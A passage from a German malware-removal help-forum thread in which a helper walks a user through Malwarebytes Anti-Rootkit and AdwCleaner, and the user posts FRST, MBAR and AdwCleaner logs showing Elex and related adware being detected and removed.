Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
Pfad des fehlerhaften Moduls: C:\Windows\syswow64\KERNELBASE.dll
Berichtskennung: 7c7a0eec-3d70-11e7-b769-c01885aadbce

Error: (05/20/2017 05:07:31 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Fehler beim Erstellen des Wiederherstellungspunkts (Prozess = C:\Windows\system32\svchost.exe -k netsvcs; Beschreibung = Windows Update; Fehler = 0x80070422).

Error: (05/20/2017 05:02:21 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/20/2017 11:51:26 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/20/2017 07:43:58 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/20/2017 07:39:03 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/19/2017 04:57:05 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/19/2017 04:47:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/19/2017 04:05:51 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.


Systemfehler:
=============
Error: (05/20/2017 05:29:05 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Windows Office Locker" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/20/2017 05:29:05 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Windows Applications Services" wurde mit folgendem Fehler beendet: 
Das angegebene Modul wurde nicht gefunden.

Error: (05/20/2017 05:29:05 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Microsoft Software Shadow Provider" wurde mit folgendem Fehler beendet: 
Das angegebene Modul wurde nicht gefunden.

Error: (05/20/2017 05:29:04 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Internet Information Service" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/20/2017 05:29:04 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/20/2017 05:29:03 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Microsoft IdentityCRL Service" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/20/2017 05:27:03 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Das Laden folgender Boot- oder Systemstarttreiber ist fehlgeschlagen: 
87f0b4a3c84aef52d85483d98a273fd7
iSafeKrnlMon

Error: (05/20/2017 05:27:02 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "WinSAPSvc" wurde mit folgendem Fehler beendet: 
Das angegebene Modul wurde nicht gefunden.

Error: (05/20/2017 05:27:02 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "WANARE" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/20/2017 05:27:02 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "VNASRE" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.


CodeIntegrity:
===================================
  Date: 2017-05-20 17:27:07.875
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-20 17:22:23.169
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-20 17:02:24.683
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-20 11:51:29.877
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-20 07:44:01.552
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-20 07:39:06.293
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-20 07:36:43.750
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-19 16:57:08.735
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-19 16:47:39.182
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-19 16:46:56.637
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Prozentuale Nutzung des RAM: 31%
Installierter physikalischer RAM: 8087.41 MB
Verfügbarer physikalischer RAM: 5559.41 MB
Summe virtueller Speicher: 16473.01 MB
Verfügbarer virtueller Speicher: 13811.63 MB

==================== Laufwerke ================================

Drive c: (System) (Fixed) (Total:188.51 GB) (Free:107.41 GB) NTFS
Drive e: (Volume) (Fixed) (Total:681.96 GB) (Free:417.12 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 236 GB) (Disk ID: 3EEEC186)
Partition 1: (Active) - (Size=6.2 GB) - (Type=27)
Partition 2: (Not Active) - (Size=229.8 GB) - (Type=05)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 698.6 GB) (Disk ID: 0E5EE332)
Partition 1: (Active) - (Size=2 GB) - (Type=27)
Partition 2: (Not Active) - (Size=696.6 GB) - (Type=OF Extended)

==================== Ende von Addition.txt ============================

--- --- ---

burningice · 20.05.2017, 17:01

dann mal ran an den Speck:

Schritt: 1
Downloade dir bitte

Malwarebytes Anti-Rootkit und speichere es auf deinem Desktop.

Starte bitte die mbar.exe.
Folge den Anweisungen auf deinem Bildschirm gemäß Anleitung zu Malwarebytes Anti-Rootkit
Aktualisiere unbedingt die Datenbank und erlaube dem Tool, dein System zu scannen.
Klicke auf den CleanUp Button und erlaube den Neustart.
Während dem Neustart wird MBAR die gefundenen Objekte entfernen, also bleib geduldig.
Nach dem Neustart starte die mbar.exe erneut.
Sollte nochmal was gefunden werden, wiederhole den CleanUp Prozess.

Das Tool wird im erstellten Ordner eine Logfile ( mbar-log-<Jahr-Monat-Tag>.txt ) erzeugen. Bitte poste diese hier.

Starte keine andere Datei in diesem Ordner ohne Anweisung eines Helfers

MBJPaul · 21.05.2017, 08:25

Hallo,
noch mal Danke für deine schnellen Antworten.

Ich habe Malwarebytes durchlaufen lassen wie angewiesen und nur im ersten durchlaufen Malware gefunden und bereinigt.

Im zweiten Durchlauf hat das Programmm dann keine weiteren Threads mehr gefunden.

Ich habe dementsprechend auch zwei Log Files:

Der erste:

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
main: v2017.05.21.01
rootkit: v2017.04.02.01

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.18665
Markus :: MARKUS-PC [administrator]

21.05.2017 08:41:43
mbar-log-2017-05-21 (08-41-43).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 301001
Time elapsed: 11 minute(s), 25 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 22
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7A2D82DC-B977-42C6-B06F-305C2A0FCC4B} (Adware.Elex) -> Delete on reboot. [774eef2b2386280e39c33c8654ad5ea2]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{EBC15A2C-025C-4ECA-98E9-4C78CF03571E} (Adware.Elex) -> Delete on reboot. [5c69f3272b7e340294323352c63b6898]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{FE5E5492-AD3E-49DF-A90E-C79C6B325289} (Adware.Elex) -> Delete on reboot. [d7ee9783fcad0a2c14c6fd9eb44c8e72]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Milimili (Adware.Elex) -> Delete on reboot. [8b3ada408d1c91a58a16e0bb857bb24e]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Samsung Update (Adware.Elex) -> Delete on reboot. [3c8977a3d6d37eb8c177fcc3dc251fe1]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Windows-PG (Adware.Elex) -> Delete on reboot. [695cbe5c4960f73f5f185e2627da738d]
HKLM\SOFTWARE\WOW6432NODE\Dayglad (Adware.Ghokswa) -> Delete on reboot. [497c9f7b1099d462040a8a552ad748b8]
HKLM\SOFTWARE\WOW6432NODE\Footjane (Adware.Ghokswa) -> Delete on reboot. [ab1a62b8c1e8ce68c6d2726a01005ca4]
HKLM\SOFTWARE\WOW6432NODE\Hotleaf (Adware.Ghokswa) -> Delete on reboot. [fdc87c9ed8d141f5d89e27b67e830bf5]
HKLM\SOFTWARE\WOW6432NODE\initialsite123Software (Adware.Elex.SHHKRST) -> Delete on reboot. [0cb9b565adfc8bab89383fe6cf32847c]
HKLM\SOFTWARE\WOW6432NODE\{84416237-6490-494D-9AD6-4994DD978971} (Adware.Elex) -> Delete on reboot. [3a8b3cde00a971c5b1aae96d00019868]
HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\PRINT\PROVIDERS\1VMOX6D7 (Adware.Sasquor.SPL) -> Delete on reboot. [586d968476333cfa3107d182df21a35d]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\CWASRE (Adware.Elex) -> Delete on reboot. [289df4267237a88ea2a505d5bd448080]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\IISvr (Adware.Elex) -> Delete on reboot. [d8ed3cde6a3fc76f6aff4e7c50b108f8]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\Kitty (Adware.Elex.Generic) -> Delete on reboot. [7f461a00bcedf54109997aae05fb0cf4]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SNAREA (Adware.Elex) -> Delete on reboot. [c50073a72584f5411c5eebdf44bd24dc]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\swpvr (Adware.Elex) -> Delete on reboot. [2c99dd3df2b7cc6aed8177668f72a957]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\VNASRE (Adware.Elex) -> Delete on reboot. [a61fa6748a1fa195e65ba1293bc69070]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WANARE (Adware.Elex) -> Delete on reboot. [14b17f9b00a9d660859888c8a25e6b95]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WinAppSvr (Adware.Elex) -> Delete on reboot. [23a2a6742a7ff145b89db91e0ff2d62a]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WindowsOfficeSrv (Adware.Elex) -> Delete on reboot. [735222f85f4a69cd885b382805fcca36]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\ISAFEKRNLMON (FraudTool.YAC) -> Delete on reboot. [bd0870aa3574de58536b81c27e84a957]

Registry Values Detected: 7
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7A2D82DC-B977-42C6-B06F-305C2A0FCC4B}|Path (Adware.Elex) -> Data: \Samsung Update -> Delete on reboot. [774eef2b2386280e39c33c8654ad5ea2]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{EBC15A2C-025C-4ECA-98E9-4C78CF03571E}|Path (Adware.Elex) -> Data: \Windows-PG -> Delete on reboot. [5c69f3272b7e340294323352c63b6898]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{FE5E5492-AD3E-49DF-A90E-C79C6B325289}|Path (Adware.Elex) -> Data: \Milimili -> Delete on reboot. [d7ee9783fcad0a2c14c6fd9eb44c8e72]
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELLEXECUTEHOOKS|{3359997A-2343-11E7-891A-64006A5CFC23} (Adware.Elex.SHHKRST) -> Data: -> Delete on reboot. [60652ded4a5f2f07e24caf240df409f7]
HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\PRINT\PROVIDERS\1vmox6d7|Name (Adware.Sasquor.SPL) -> Data: C:\Program Files (x86)\Jujalyclartion Launcher\local64spl.dll -> Delete on reboot. [586d968476333cfa3107d182df21a35d]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\iSafeKrnlMon|ImagePath (FraudTool.YAC) -> Data: \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys -> Delete on reboot. [bd0870aa3574de58536b81c27e84a957]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\FIREWALLRULES|{E59CD4FF-E038-4054-A24D-14B9E22A1A3D} (Adware.Ghokswa) -> Data: v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\Hotleaf\Application\chrome.exe|Name=Chrome browser| -> Delete on reboot. [bd0826f48b1e7bbbe2a0e7f62bd6ca36]

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 2
C:\Windows\Update\psgo (Adware.Elex) -> Delete on reboot. [f1d475a56742092d7305c01d24dd837d]
C:\Program Files (x86)\Prodak (Adware.Elex) -> Delete on reboot. [e1e49b7f7b2e6bcb828f15cac63bfd03]

Files Detected: 11
C:\WINDOWS\SYSTEM32\drivers\iSafeKrnlBoot.sys (FraudTool.YAC) -> Delete on reboot. [fab2eba07369bf3c6db33469b5b36fcb]
C:\WINDOWS\SYSTEM32\drivers\iSafeNetFilter.sys (FraudTool.YAC) -> Delete on reboot. [9fb02fba90f6af59537a30c3db9777c8]
C:\Windows\Update\psgo\psgo.ps1 (Adware.Elex) -> Delete on reboot. [f1d475a56742092d7305c01d24dd837d]
C:\Users\Markus\AppData\Roaming\Profiles\Gzsepimuly.default\prefs.js (Adware.Elex) -> Bad: (user_pref("browser.newtab.url", "hxxp://www.initialsite123.com/?z=62e413ff915f780a49cc065g8z9t1o7m3eco3t4qcc&from=fss&uid=IntensoXXSSDXSataXIII_AA000000000000003571&type=hp")

Good: () -> Replace on reboot. [f2d34ecc426743f32d91484a6f92916f]
C:\Users\Markus\AppData\Roaming\Profiles\Gzsepimuly.default\prefs.js (Adware.Elex) -> Bad: (.migrated.updateDir", true);
user_pref("browser.cache.disk.capa) Good: () -> Replace on reboot. [2d9854c62683ad89c7f70f83d130639d]
C:\Users\Markus\AppData\Roaming\Profiles\Gzsepimuly.default\prefs.js (Adware.Elex) -> Bad: (nges will be overwritten when the application exits.
*
* To make a manual change to preferences, you can visit the URL about:config
*/

user_pref("accessibility.typeaheadfind", tr) Good: () -> Replace on reboot. [e6df5fbb05a4cf67744afe9434cdae52]
C:\Users\Markus\AppData\Roaming\Profiles\Gzsepimuly.default\prefs.js (Adware.Elex) -> Bad: (is running,
* the changes will be overwritten when the application exits.
*
* To make a manual change to preferences, you can visit the URL about:config
*/

user_pref("accessibility.typeaheadfind", tr) Good: () -> Replace on reboot. [05c0cd4dbaefc57198268210e120dc24]
C:\Users\Markus\AppData\Roaming\Profiles\Gzsepimuly.default\prefs.js (Adware.Elex) -> Bad: (rences, you can visit the URL about:config
*/

user_pref("accessibility.typeaheadfind", true);
user_pref("accessibility.typeaheadfind.flashBar", 0);
user_pref("app.update.auto", false);
user_pref("app.upd) Good: () -> Replace on reboot. [c6ffc456eabf0135813d1181f80960a0]
C:\Users\Markus\AppData\Roaming\Profiles\Gzsepimuly.default\prefs.js (Adware.Elex) -> Bad: (nges will be overwritten when the application exits.
*
* ) Good: () -> Replace on reboot. [586d0a1012973df916a8f2a04db4d729]
C:\Users\Markus\AppData\Roaming\Profiles\Gzsepimuly.default\prefs.js (Adware.Elex) -> Bad: (peaheadfind.flashBar", 0);
user_pref("app.update.auto", false);
user_pref("app.update.enabled", false);
user_pref("app.update.lastUpdateTime.addon-background-update-timer", 14926) Good: () -> Replace on reboot. [378ea872cbde1224bfff840e48b9f709]
C:\Users\Markus\AppData\Roaming\Profiles\Gzsepimuly.default\searchplugins\hwduz6b3.xml (Adware.Elex) -> Delete on reboot. [7b4af624951486b039846b271de4b54b]

Physical Sectors Detected: 0
(No malicious items detected)

(end)

.....und hier der zweite:

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
main: v2017.05.21.01
rootkit: v2017.04.02.01

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.18665
Markus :: MARKUS-PC [administrator]

21.05.2017 08:56:15
mbar-log-2017-05-21 (08-56-15).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 300466
Time elapsed: 11 minute(s), 50 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)

burningice · 21.05.2017, 16:31

Schritt 1
Downloade Dir bitte AdwCleaner auf deinen Desktop.

Schließe alle offenen Programme und Browser.
Starte die adwcleaner.exe mit einem Doppelklick.
Stimme den Nutzungsbedingungen zu.
Klicke auf Werkzeuge > Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
- "Tracing" Schlüssel
- "Prefetch" Dateien
- Proxy
- Winsock
- Internet Explorer Richtlinien
- Chrome Richtlinien
Bestätige die Auswahl mit Ok.
Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
Klicke nun auf Löschen (auch dann wenn AdwCleaner sagt, dass nichts gefunden wurde) und bestätige auftretende Hinweise mit Ok.
Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).

Schritt 2
Lade dir folgendes Programm herunter und installiere es:

Malwarebytes Anti-Malware

Starte Malwarebytes' Anti-Malware (MBAM).
Klicke im Anschluss auf Scan, wähle den Bedrohungs-Scan aus und klicke auf Scan starten.
Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Ausgewählte Elemente in die Quarantäne verschieben.
Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
Starte MBAM nach dem Neustart, klicke auf Berichte.
Wähle den neuesten Scan-Bericht aus, klicke auf Bericht anzeigen und dann auf Export.
Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab.
Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.

Schritt 3
Bitte starte wieder FRST, setze den Haken bei Addition und bei Dateiliste 90 Tage und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen.

Cave: Es steht auch Dateiliste 90 Tage, nicht nur Addition.txt

Bitte poste in deiner nächsten Antwort also:

Logfile von AdwCleaner
Logfile von Malwarebytes
Frst.txt
Addition.txt

MBJPaul · 22.05.2017, 20:06

Zu Schritt 1: ADwCleaner Log Datei:AdwCleaner Logfile:

Code:

ATTFilter

# AdwCleaner v6.046 - Bericht erstellt am 21/05/2017 um 19:45:13
# Aktualisiert am 24/04/2017 von Malwarebytes
# Datenbank : 2017-05-19.1 [Lokal]
# Betriebssystem : Windows 7 Professional Service Pack 1 (X64)
# Benutzername : Markus - MARKUS-PC
# Gestartet von : C:\Users\Markus\Desktop\AdwCleaner_6.046.exe
# Modus: Löschen
# Unterstützung : https://www.malwarebytes.com/support



***** [ Dienste ] *****

[-] Dienst gelöscht: 87f0b4a3c84aef52d85483d98a273fd7
[-] Dienst gelöscht: WinSAPSvc
[-] Dienst gelöscht: SNARE
[-] Dienst gelöscht: CSHMDR


***** [ Ordner ] *****

[-] Ordner gelöscht: C:\Users\Markus\AppData\Local\GeoLocator
[-] Ordner gelöscht: C:\Users\Markus\AppData\Roaming\Note-up
[#] Ordner mit Neustart gelöscht: C:\Users\Markus\AppData\Roaming\Note-UP
[-] Ordner gelöscht: C:\ProgramData\vCore
[#] Ordner mit Neustart gelöscht: C:\ProgramData\Application Data\vCore
[-] Ordner gelöscht: C:\Users\Markus\AppData\Roaming\browsers
[-] Ordner gelöscht: C:\Program Files (x86)\Firefox
[-] Ordner gelöscht: C:\Users\Markus\AppData\Roaming\SPI
[-] Ordner gelöscht: C:\Users\Markus\AppData\Roaming\Firefox
[-] Ordner gelöscht: C:\Users\Markus\AppData\Local\Firefox


***** [ Dateien ] *****

[-] Datei gelöscht: C:\Windows\SysNative\log\iSafeKrnlCall.log
[-] Datei gelöscht: C:\Users\Public\Documents\temp.dat
[-] Datei gelöscht: C:\Users\Public\Documents\report.dat


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Verknüpfungen ] *****



***** [ Aufgabenplanung ] *****

[-] Aufgabe gelöscht: DigitalSite
[-] Aufgabe gelöscht: Scheduled Update for Ask Toolbar
[-] Aufgabe gelöscht: Microsoft\Windows\Media Center\VCore


***** [ Registrierungsdatenbank ] *****

[-] Schlüssel gelöscht: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\Software\Classes\TypeLib\{006AD7B2-968A-11DE-88C9-5BDE55D89593}
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Classes\CLSID\{00B11DA2-75ED-4364-ABA5-9A95B1F5E946}
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Classes\CLSID\{744E0E81-BC79-4719-A58B-C98F7E78EE5D}
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Classes\Interface\{237FDFDB-3722-470E-8BA8-90196DABE967}
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Classes\Interface\{B1290521-AB01-40EB-B993-AD122BEFC9E2}
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\Classes\TypeLib\{006AD7B2-968A-11DE-88C9-5BDE55D89593}
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Classes\TypeLib\{1EB0A0B0-CABB-495C-A85A-7C8F891799C7}
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Classes\TypeLib\{F126C9FC-9299-40F2-BD42-C59023AD1E7F}
[-] Wert gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{58124A0B-DC32-4180-9BFF-E0E21AE34026}]
[-] Wert gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{977AE9CC-AF83-45E8-9E03-E2798216E2D5}]
[-] Wert gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{A09AB6EB-31B5-454C-97EC-9B294D92EE2A}]
[-] Schlüssel gelöscht: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\Software\foxydeal
[-] Schlüssel gelöscht: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\Software\AppDataLow\Software\Re_Markit
[-] Schlüssel gelöscht: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\Software\Microsoft\Windows\CurrentVersion\Uninstall\DigitalSite
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\foxydeal
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\AppDataLow\Software\Re_Markit
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Socia2S Browser Enhancer
[-] Schlüssel gelöscht: HKLM\SOFTWARE\ourluckysitesSoftware
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\DigitalSite
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Eusing Free Registry Cleaner
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\foxydeal
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\AppDataLow\Software\Re_Markit
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\InterSect Alliance
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Socia2S Browser Enhancer
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\DigitalSite
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A28B4D68DEBAA244EB686953B7074FEF
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0238BBE24EA3A70408B81E4BB89C15E5
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0CFE535C35F99574E8340BFA75BF92C2
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\261F213D1F55267499B1F87D0CC3BCF7
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\29799DE249E7DBC459FC6C8F07EB8375
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\43C098337DB065A49B665D4EA7F16D1C
